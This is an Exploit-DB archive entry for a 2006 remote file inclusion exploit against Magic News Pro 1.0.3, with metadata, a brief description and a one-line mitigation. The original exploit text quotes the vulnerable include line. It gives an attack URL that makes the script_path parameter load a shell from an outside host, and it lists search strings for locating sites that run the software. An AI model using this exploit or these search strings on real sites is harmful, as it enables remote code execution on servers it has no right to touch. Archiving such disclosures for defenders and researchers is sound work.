Magic News Pro => 1.0.3 (script_path) Remote File Inclusion Exploit

vendor:

Magic News Pro

by:

Saudi Hackrz

N/A

CVSS

N/A

Remote File Inclusion

CWE

Product Name: Magic News Pro

Affected Version From: 1.0.3

Affected Version To: 1.0.3

Patch Exists: NO

Related CWE: N/A

CPE: a:reamdaysoft:magic_news_pro:1.0.3

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

Magic News Pro => 1.0.3 (script_path) Remote File Inclusion Exploit

Magic News Pro version 1.0.3 is vulnerable to a remote file inclusion vulnerability. The vulnerability exists due to insufficient sanitization of user-supplied input to the 'script_path' parameter in the 'news_page.php' script. An attacker can exploit this vulnerability to execute arbitrary PHP code on the vulnerable system by sending a specially crafted HTTP request containing a malicious URL in the 'script_path' parameter.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized.

Source

Exploit-DB raw data:

#====================================================================
#Magic News Pro => 1.0.3 (script_path) Remote File Inclusion Exploit
#====================================================================
#
#Critical Level : Dangerous
#
#By Saudi Hackrz
#
#http://www.reamdaysoft.com
#http://www.reamdaysoft.com/magic-news-pro/overview.html
#=================================================================
#
#Script Name: Magic News Pro v 1.0.3
#Script :) << $$
#http://www.9q9q.net/up3/index.php?f=jMicDawzV
#
#=================================================================
#Bug in : news_page.php
#        include_once($script_path."/config.php");
#
#in <<<<  news/scripts/news_page.php
#Serche : "js-news.php?nr=" or "mgic news pro" or "js-news.php"
#=================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/news/scripts/news_page.php?script_path=http://SHELLURL.COM?
#
#===============================================================================
#Discoverd By : Saudi Hackrz
#
#Conatact : Saudi.unix[at]hotmail.com
#
#GreetZ :SnIpEr_Sa , KiNg18 , LeCoPrA And All My Frind :)
#www.S3hr.com . www.elite-team.cc/vb .www.3asfh.net . www.lezr.com/vb .www.xp10.com
===============================================================================#

# milw0rm.com [2006-09-13]